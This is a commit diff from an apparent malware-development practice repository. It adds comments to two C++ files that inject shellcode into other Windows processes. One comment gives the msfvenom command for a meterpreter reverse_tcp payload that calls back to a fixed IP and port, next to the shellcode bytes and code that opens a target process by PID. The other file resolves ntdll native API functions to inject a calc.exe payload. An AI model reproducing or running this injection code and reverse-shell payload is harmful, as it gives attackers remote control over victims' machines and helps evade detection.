rpuzonas/malware-dev
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

add comments, how shellcode was generated

Browse Source
This commit is contained in:
Rokas Puzonas 2023-11-03 17:02:28 +02:00
parent 0900ac1cdb
commit 3e57d1867d
2 changed files with 7 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

3
3-shellcode-injection/main.cpp
View File

@ -5,6 +5,7 @@
#define log_err(msg, ...) printf("[-] " msg "\n", ##__VA_ARGS__) #define log_err(msg, ...) printf("[-] " msg "\n", ##__VA_ARGS__)
#define log_ok(msg, ...) printf("[+] " msg "\n", ##__VA_ARGS__) #define log_ok(msg, ...) printf("[+] " msg "\n", ##__VA_ARGS__)
// msfvenom --platform windows --arch x64 -p windows/x64/meterpreter/reverse_tcp LHOST=172.24.224.1 LPORT=12345 -f c --var-name=g_shellcode
char g_shellcode[] = char g_shellcode[] =
"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50" "\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50"
"\x52\x48\x31\xd2\x51\x56\x65\x48\x8b\x52\x60\x48\x8b\x52" "\x52\x48\x31\xd2\x51\x56\x65\x48\x8b\x52\x60\x48\x8b\x52"
@ -52,7 +53,7 @@ int main(int argc, char **argv) {
DWORD pid = atoi(argv[1]); DWORD pid = atoi(argv[1]);
log_info("Opening process with pid %ld", pid); log_info("Opening process with pid %ld", pid);
HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, TRUE, pid); HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, TRUE, pid);
if (process == NULL) { if (process == NULL) {
log_err("Failed to open process: %ld", GetLastError()); log_err("Failed to open process: %ld", GetLastError());

9
7-native-api/main.cpp
View File

@ -8,6 +8,7 @@
#define log_err(msg, ...) log("[-] " msg, ##__VA_ARGS__) #define log_err(msg, ...) log("[-] " msg, ##__VA_ARGS__)
#define log_ok(msg, ...) log("[+] " msg, ##__VA_ARGS__) #define log_ok(msg, ...) log("[+] " msg, ##__VA_ARGS__)
// msfvenom --platform windows --arch x64 -p windows/x64/exec cmd=calc.exe -f c --var-name=g_shellcode
unsigned char g_shellcode[] = unsigned char g_shellcode[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50" "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52" "\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
@ -51,7 +52,7 @@ int main(int argc, char **argv) {
NtWaitForSingleObject nt_wait_for_single_object = NULL; NtWaitForSingleObject nt_wait_for_single_object = NULL;
// Grab NT API functions // Grab NT API functions
{ {
HMODULE ntdll_module = GetModuleHandleA("Ntdll"); HMODULE ntdll_module = GetModuleHandleA("Ntdll");
if (ntdll_module == NULL) { if (ntdll_module == NULL) {
log_err("Failed get Ntdll.dll: %ld", GetLastError()); log_err("Failed get Ntdll.dll: %ld", GetLastError());
@ -87,16 +88,16 @@ int main(int argc, char **argv) {
log_err("Failed get NtWriteVirtualMemory: %ld", GetLastError()); log_err("Failed get NtWriteVirtualMemory: %ld", GetLastError());
goto cleanup; goto cleanup;
} }
nt_wait_for_single_object = (NtWaitForSingleObject)GetProcAddress(ntdll_module, "NtWaitForSingleObject"); nt_wait_for_single_object = (NtWaitForSingleObject)GetProcAddress(ntdll_module, "NtWaitForSingleObject");
if (nt_wait_for_single_object == NULL) { if (nt_wait_for_single_object == NULL) {
log_err("Failed get NtWaitForSingleObject: %ld", GetLastError()); log_err("Failed get NtWaitForSingleObject: %ld", GetLastError());
goto cleanup; goto cleanup;
} }
} }
// OpenProcess() // OpenProcess()
{ {
OBJECT_ATTRIBUTES OA = { sizeof(OA), NULL }; OBJECT_ATTRIBUTES OA = { sizeof(OA), NULL };
CLIENT_ID CID = { (HANDLE)pid, NULL }; CLIENT_ID CID = { (HANDLE)pid, NULL };